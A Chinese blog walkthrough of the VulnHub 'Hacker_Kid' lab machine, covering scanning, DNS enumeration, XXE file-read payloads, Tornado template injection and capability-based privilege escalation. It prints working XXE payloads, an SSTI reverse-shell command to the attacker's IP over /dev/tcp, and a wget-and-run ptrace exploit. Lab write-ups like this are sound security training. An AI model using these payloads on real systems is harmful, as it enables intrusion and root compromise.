vulnhub之Hacker_Kid-v1.0.1

最新推荐文章于 2024-07-26 10:56:39 发布
最新推荐文章于 2024-07-26 10:56:39 发布
阅读量909 收藏 1
点赞数
分类专栏: 网络安全 文章标签: web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qwweggfe/article/details/119861584
版权

kali:192.168.181.129

靶机:192.168.181.154

信息收集

首先进行ip扫描

打开网页进行查看 

查看开启哪些端口

nmap -sC -sV 192.168.181.154 --min-rate=2000 -v -p-

 

我们可以看到有两个开启了http服务

于是我在80 端口查看源码,他给我们一个提示

 说是通过有一个 GET 参数“page_no”,进行模糊测试,于是使用brupsuit进行尝试

 

 

webshell

 发现数值大小,对网页有不同影响,于是打开网页进行查看

 在最底下给了个提示 ,于是将这个域名加载到/etc/hosts下

 对其他域名进行爆破,使用dig

dig hackers.blackhat.local @192.168.181.154

 我们爆破了新的域名,于是将他添加到/etc/hosts

于是在kali的网页上进行访问

 于是进行抓包分析

 我发现他是一个xxe漏洞,有点像xxe实体注入

参考:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection

我对其进行修改,我们要读取/etc/passwd

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
<root>
<name></name>
<tel></tel>
<email>

&xxe;</email>
<password></password>
</root>

 修改后,发现读取成功,但是好像/etc/passwd好像被替换了

 我在打开.bashrc时,没有打开,但是在使用使用 PHP 包装器时,我们可以获得 base64 格式的内容

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'php://filter/convert.base64-encode/resource=/home/saket/.bashrc'>]>
<root>
<name></name>
<tel></tel>
<email>

&xxe;</email>
<password></password>
</root>

于是进行base64解码,在最后发现了用户名密码

上文还有一个9999端口也开启http服务,且运行Tornado,于是打开进行查看

 没有成功,于是我使用saket进行登录,因为在上文中只有这个用户在/home下,密码不变

 由于Tornado是一个Python web的技术,我怀疑GET一个参数‘name’,我们可以传入一个参数

 于是我进行简单的SSTI负载

参考

https//book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#tornado-python

 说明命令可以执行,于是进行反弹

{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.181.129/9001 0>&1"')}}

 在kali进行监听9001端口

但是,没有成功,于是我进行url编码

%7B%25%20import%20os%20%25%7D%7B%7Bos.system(%27bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.181.129%2F9001%200%3E%261%22%27)%7D%7D

权限提升:

 于是使用getcap,他说admin在这个目录下

/sbin/getcap -r / 2>/dev/null

 为此我们必须确定根进程

 于是将ID914作为进程的 PID 作为参数。执行漏洞利用后,它会在端口 5600 处创建一个绑定 shell。因此,我们可以连接到绑定 shell 并获取 root shell

cd /tmp

wget https://gist.githubusercontent.com/wifisecguy/1d69839fe855c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py

python2.7 inject.py 914

ss -tnlp

 于是在kali进行链接

 于是获得root权限

我带的我们
关注
专栏目录
Hacker_Kid-v1.0.1打靶记录
wwd180的博客
06-16 135
实验主机:攻击机kali(192.168.109.131)靶机Hacker_Kid-v1.0.1(192.168.109.133)实验目标:获取root权限实验网络:NAT。
Hacker_kid-v1.0.1(vulnhub)
wcl20010的博客
05-07 1651
中等难度的靶机,取得权限即可(提示:信息收集,不需要爆破) 此靶机存在的都是新兴的漏洞类型。 地址如下: https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova 1.主机发现 arp-scan -l 2.端口发现 nmap -p 1-65535 -A 192.168.56.106 详细信息如下: 53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux) | dns-nsid:
vulnhub靶场-Hacker_Kid-v1.0.1
qq_42947816的博客
06-27 1722
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
Hacker kid靶场渗透
最新发布
m0_59518755的博客
07-26 869
Hacker kid靶场渗透教程,特别详细,新手小白都能看懂
vulnhub靶场——Hacker-Kid-v1-0-1
Czheisenberg的博客
03-03 7036
vulnhub靶场——Hacker-Kid-v1-0-1 WP
Vulnhub靶机:HACKER KID_ 1.0.1
LainWith的博客
07-17 915
系列Hackerkid(此系列共1台)发布日期2021年08月02日**难度等级**低→中**打靶目标**取得root权限**提示信息**OSCP样式的靶机(专注于信息收集,不要爆破,每一步都有适当提示)https主机发现端口扫描WEB信息收集DNS区域传输XXE注入攻击PHP封装器SSTI模板注入Capabilitie提权httpshttpshttpshttpshttpshttpshttpshttpshttpshttps。...
VnlnHub Hacker_Kid-v1.0.1
weixin_45682839的博客
09-09 311
VnlnHub Hacker_Kid-v1.0.1靶机通关攻略记录,涉及知识包括:端口服务探测、WEB信息搜集、url参数值爆破、DNS区域传输、XXE注入攻击、PHP封装器、SSTI模板注入、Capabilitie提权
leetcode和oj-Leet_Code-Hacker_Rank:Leet_Code-Hacker_Rank
06-30
《LeetCode与Hacker Rank:在线编程挑战的宝库》 LeetCode和Hacker Rank是两个备受程序员喜爱的在线编程挑战平台,它们为提升技能、准备面试和了解最新技术趋势提供了丰富的资源。这两个平台不仅有助于巩固基础,还...
hacker_rank-java
03-30
标题 "hacker_rank-java" 暗示了这个压缩包可能包含了与 Hacker Rank 平台上的 Java 相关的编程挑战或练习项目。Hacker Rank 是一个著名的在线平台,程序员可以在这里通过解决各种编程问题来提升技能并进行面试准备...
AlgorithmsX-v1.0.1:LeetCode HackerRank算法
05-09
《算法X-v1.0.1:LeetCode与HackerRank中的算法解析》 在编程领域,算法是解决问题的关键,而LeetCode和HackerRank则是检验和提升算法能力的重要平台。"AlgorithmsX-v1.0.1"是一个专注于算法实践的项目,它将Java...
OSCP-Vulnhub靶机记录-hacker-kid-walkthrough
深入交流学习:webMsec
09-30 297
把inject.py复制到攻击机,然后开启http服务,在靶机通过wget下载inject.py。这里有个提示:DIG,结合53端口DNS服务,后面可以尝试DNS枚举。得到一个子域名:hackers.blackhat.local。找到saket用户,/bin/bash。尝试SSTI注入: {{7*7}}3被带出来了,email是注入点。继续添加进/etc/hosts。成功带出/etc/passwd。添加到 /etc/hosts。放到repeater里X进去。
dockerVERR_UNRESOLVED_ERROR修复
10-11
Unable to load R3 module C:\Program Files\Oracle\VirtualBox/VBoxDD.DLL (VBoxDD): GetLastError=1790 (VERR_UNRESOLVED_ERROR)
Vulnhub靶场——Hacker_Kid-v1.0.1
Re1_zf的博客
10-10 1066
这里需要用到一个提权脚本,这个脚本的作用就是对root权限的进程注入python类型shellcode,利用python具备的cap_sys_ptrace+ep能力实现权限提升。此脚本如果执行成功,会在靶机本地监听5600端口,不过也可以修改脚本shellcode部分使其监听其他端口。搜索后发现,9999端口开放的一般是tornado服务,是一个python的web服务框架。前面访问的9999端口是一个登录页面,也许有用,拿去尝试登录一下。给name变量赋值会有回显,后端的变量应该就是name。
Hacker_Kid-v1.0.1靶机
weixin_45691672的博客
06-16 1056
实验主机:Hacker_Kid-v1.0.1靶机一台/Kali linux攻击机一台Hacker_Kid-v1.0.1靶机 IP:192.168.3.225Kali linux攻击机 IP:192.168.3.32实验网络:桥接模式实验目标:获取靶机的Root权限。
Hacker_Kid-v1.0.1
qq_45747465的博客
06-15 346
打靶机--Hacker_Kid-v1.0.1
靶场-Hacker_Kid-v1.0.1
weixin_58602402的博客
06-16 299
5.nmap扫描出来的信息知道这里是tornado框架,可能存在ssti注入,测试:192.168.12.170:9999/?name={{3*3}}3.对9999端口的登录页面进行登录,用户admin失败,saket/Saket!2./usr/bin/python2.7 权限设置是有问题的,查找与root相关的进程。base64解密后,发现用户名和密码:admin/Saket!2.对靶机ip进行端口扫描,53端口、80端口和9999端口。1.主机发现,发现靶机ip:192.168.12.170。
kali之vulnhub,hackerkid
weixin_54431413的博客
05-20 1075
此次打靶主要涉及到一些比较新型的漏洞,如DNS区域传输漏洞,XXE漏洞,模板注入,涉及了一种新型的提权方式,利用capabilities的cap_sys_ptrace来提权。
Vulnhub-Hacker kid: 1.0.1渗透
laoyanCZ的博客
12-12 1043
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
HACKER KID: 1.0.1实战演练
龙狼刺的博客
05-30 749
Hacker-Kid实战演练。
resource hacker v5.1.8 build 360
04-30
Resource Hacker是一个免费的开源工具,其功能是对Windows操作系统下可执行文件(.exe、.dll等)中的资源(如图标、位图、对话框等)进行修改和编辑。 Resource Hacker v5.1.8 Build 360是最新版本,它包含了一些重要的新功能和改进,例如在Windows 10环境下的完整兼容性、添加了一个“字符串表排序”功能,这使得编辑字符串表更为方便,同时还改进了其它一些编辑工具窗口的外观和功能。 使用Resource Hacker还可以进行一些常见的文件操作,比如打开文件,查看文件的基本信息,导出和导入指定的资源等等。Resource Hacker的界面简洁、易于使用,用户可以快速找到需要修改的资源,并进行编辑。总之,Resource Hacker是一款十分实用的资源编辑工具,尤其适合开发人员和爱好者使用。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值